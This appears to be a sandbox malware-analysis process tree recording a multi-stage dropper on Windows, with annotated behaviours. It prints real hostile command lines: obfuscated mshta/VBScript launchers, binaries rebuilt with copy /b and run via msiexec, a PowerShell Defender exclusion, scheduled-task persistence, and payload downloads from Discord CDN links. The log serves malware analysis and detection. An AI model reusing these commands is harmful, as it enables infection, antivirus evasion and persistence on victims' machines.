C:\Users\Admin\Pictures\Adobe Films\aVCJWuC78D8ytjpBnuonYiMt.exe"C:\Users\Admin\Pictures\Adobe Films\aVCJWuC78D8ytjpBnuonYiMt.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Jm8HLB0eQU3BTdk5zhJMuwPW.exe"C:\Users\Admin\Pictures\Adobe Films\Jm8HLB0eQU3BTdk5zhJMuwPW.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Jm8HLB0eQU3BTdk5zhJMuwPW.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\Jm8HLB0eQU3BTdk5zhJMuwPW.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Jm8HLB0eQU3BTdk5zhJMuwPW.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\xGgxfdTAZIxYAbC9nMWHnOyd.exe"C:\Users\Admin\Pictures\Adobe Films\xGgxfdTAZIxYAbC9nMWHnOyd.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\u0K_F2OTXf91BubRsbpokJYY.exe"C:\Users\Admin\Pictures\Adobe Films\u0K_F2OTXf91BubRsbpokJYY.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\UFx4mzvwha3EyrqLzYRJLozs.exe"C:\Users\Admin\Pictures\Adobe Films\UFx4mzvwha3EyrqLzYRJLozs.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\2yLYaayaS4pR2KzWoSRgna2g.exe"C:\Users\Admin\Pictures\Adobe Films\2yLYaayaS4pR2KzWoSRgna2g.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\romvpIxpDE1uboJ16Eu3W7ev.exe"C:\Users\Admin\Pictures\Adobe Films\romvpIxpDE1uboJ16Eu3W7ev.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\BGqO3niAQXAkx7UzE_hV4y9E.exe"C:\Users\Admin\Pictures\Adobe Films\BGqO3niAQXAkx7UzE_hV4y9E.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\lMlX5EPEJIQZ_lRN_WiFkWW1.exe"C:\Users\Admin\Pictures\Adobe Films\lMlX5EPEJIQZ_lRN_WiFkWW1.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe"C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe"7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\AdvancedRun.exe" /SpecialRun 4101d8 36529⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe" -Force8⤵
-
C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe"C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\y7zS9k1Ws2gUJrtdj2Q96yXF.exe"C:\Users\Admin\Pictures\Adobe Films\y7zS9k1Ws2gUJrtdj2Q96yXF.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\T7hE04_dLWXUHYf9p1fLrFgZ.exe"C:\Users\Admin\Documents\T7hE04_dLWXUHYf9p1fLrFgZ.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\_DIAD_8FkBX7wiZEE_6DT5or.exe"C:\Users\Admin\Pictures\Adobe Films\_DIAD_8FkBX7wiZEE_6DT5or.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\0CZzT_SbBBjSwdGZ8u_LIiCd.exe"C:\Users\Admin\Pictures\Adobe Films\0CZzT_SbBBjSwdGZ8u_LIiCd.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\DyZmhMbt7fIZ0cXKhkFYkhyN.exe"C:\Users\Admin\Pictures\Adobe Films\DyZmhMbt7fIZ0cXKhkFYkhyN.exe"9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe"C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )13⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC14⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "gUH_grZeEjNkRezN2HwYxDzk.exe"12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\tY9mbnr7DlvhFnRuAJK8dDk1.exe"C:\Users\Admin\Pictures\Adobe Films\tY9mbnr7DlvhFnRuAJK8dDk1.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\Cdy0nsQnBWPiGFHO_iFNTyWE.exe"C:\Users\Admin\Pictures\Adobe Films\Cdy0nsQnBWPiGFHO_iFNTyWE.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\mHNJCsmtrK0FHJkzRUTU2mtk.exe"C:\Users\Admin\Pictures\Adobe Films\mHNJCsmtrK0FHJkzRUTU2mtk.exe"9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\mHNJCsmtrK0FHJkzRUTU2mtk.exe"C:\Users\Admin\Pictures\Adobe Films\mHNJCsmtrK0FHJkzRUTU2mtk.exe" -u10⤵
-
C:\Users\Admin\Pictures\Adobe Films\gCsdNoPCEI7ErkSz1cNAHOCW.exe"C:\Users\Admin\Pictures\Adobe Films\gCsdNoPCEI7ErkSz1cNAHOCW.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BA4M8.tmp\gCsdNoPCEI7ErkSz1cNAHOCW.tmp"C:\Users\Admin\AppData\Local\Temp\is-BA4M8.tmp\gCsdNoPCEI7ErkSz1cNAHOCW.tmp" /SL5="$2034A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\gCsdNoPCEI7ErkSz1cNAHOCW.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-2MRCB.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-2MRCB.tmp\DYbALA.exe" /S /UID=270911⤵
-
C:\Program Files\MSBuild\LLGXRUZBEI\foldershare.exe"C:\Program Files\MSBuild\LLGXRUZBEI\foldershare.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\bd-b8445-652-9069f-6a9626fbd2412\Hatawaxeje.exe"C:\Users\Admin\AppData\Local\Temp\bd-b8445-652-9069f-6a9626fbd2412\Hatawaxeje.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\a7-4228d-af6-707b9-3db33301553dc\Daexogyxigu.exe"C:\Users\Admin\AppData\Local\Temp\a7-4228d-af6-707b9-3db33301553dc\Daexogyxigu.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5wl2l3oi.rct\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\5wl2l3oi.rct\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\5wl2l3oi.rct\GcleanerEU.exe /eufive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q0eq2owu.skh\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\q0eq2owu.skh\installer.exeC:\Users\Admin\AppData\Local\Temp\q0eq2owu.skh\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exeC:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exe"C:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n01a0ufk.33h\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\n01a0ufk.33h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\n01a0ufk.33h\gcleaner.exe /mixfive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\55vnohtc.mgo\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\Pictures\Adobe Films\xqAQrw5h6EoewxGR1rucN7IG.exe"C:\Users\Admin\Pictures\Adobe Films\xqAQrw5h6EoewxGR1rucN7IG.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"11⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d0,0x1d4,0x1d8,0x180,0x1dc,0x7ffb6f4ddec0,0x7ffb6f4dded0,0x7ffb6f4ddee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff638289e70,0x7ff638289e80,0x7ff638289e9013⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,2707089000516117176,5353714566748904763,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_946421353" --mojo-platform-channel-handle=1632 /prefetch:812⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\k8rkFQ618whqQvozq5sqYJAv.exe"C:\Users\Admin\Pictures\Adobe Films\k8rkFQ618whqQvozq5sqYJAv.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"8⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\MZGnU5fdSxCORNKj98rM7R3_.exe"C:\Users\Admin\Pictures\Adobe Films\MZGnU5fdSxCORNKj98rM7R3_.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\MZGnU5fdSxCORNKj98rM7R3_.exe"C:\Users\Admin\Pictures\Adobe Films\MZGnU5fdSxCORNKj98rM7R3_.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\UQ2PodDKeOfQz8RMLdhjHRBY.exe"C:\Users\Admin\Pictures\Adobe Films\UQ2PodDKeOfQz8RMLdhjHRBY.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\7FD8.bat "C:\Users\Admin\Pictures\Adobe Films\UQ2PodDKeOfQz8RMLdhjHRBY.exe""8⤵
-
C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902440338659090486/902440724484730900/18.exe" "18.exe" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902440338659090486/902440374369411072/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\956\18.exe18.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\956\Transmissibility.exeTransmissibility.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exe "" "" "" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe"C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\ojgDUNNP7dpScLvppbbgG2vM.exe" ) do taskkill -im "%~NxK" -F9⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "ojgDUNNP7dpScLvppbbgG2vM.exe" -F10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\vE8VUtPiqqT3L6yzMj8eK3re.exe"C:\Users\Admin\Pictures\Adobe Films\vE8VUtPiqqT3L6yzMj8eK3re.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SBEOR.tmp\vE8VUtPiqqT3L6yzMj8eK3re.tmp"C:\Users\Admin\AppData\Local\Temp\is-SBEOR.tmp\vE8VUtPiqqT3L6yzMj8eK3re.tmp" /SL5="$503B8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\vE8VUtPiqqT3L6yzMj8eK3re.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-HUSEC.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-HUSEC.tmp\DYbALA.exe" /S /UID=27109⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Google\HAOHKYHASN\foldershare.exe"C:\Program Files\Google\HAOHKYHASN\foldershare.exe" /VERYSILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\ce-5ad83-201-6cda7-d45e4e97d7334\Laekonojaefi.exe"C:\Users\Admin\AppData\Local\Temp\ce-5ad83-201-6cda7-d45e4e97d7334\Laekonojaefi.exe"10⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\d9-5cc91-cbf-8c7bc-dd8cd7c5fcfca\Wukociloly.exe"C:\Users\Admin\AppData\Local\Temp\d9-5cc91-cbf-8c7bc-dd8cd7c5fcfca\Wukociloly.exe"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ts40pgjj.51h\GcleanerEU.exe /eufive & exit11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ts40pgjj.51h\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ts40pgjj.51h\GcleanerEU.exe /eufive12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\installer.exe /qn CAMPAIGN="654" & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\installer.exeC:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\installer.exe /qn CAMPAIGN="654"12⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uny5ijhk.vqt\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634980352 /qn CAMPAIGN=""654"" " CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exe & exit11⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exeC:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exe"C:\Users\Admin\AppData\Local\Temp\knv3thxl.feo\any.exe" -u13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j5rggwis.5ez\gcleaner.exe /mixfive & exit11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Users\Admin\AppData\Local\Temp\j5rggwis.5ez\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\j5rggwis.5ez\gcleaner.exe /mixfive12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2w0efph3.pfj\autosubplayer.exe /S & exit11⤵
-
C:\Users\Admin\Pictures\Adobe Films\nSunlzyh6D8YVl3uc9TpGptO.exe"C:\Users\Admin\Pictures\Adobe Films\nSunlzyh6D8YVl3uc9TpGptO.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"9⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffb6f4ddec0,0x7ffb6f4dded0,0x7ffb6f4ddee010⤵
-
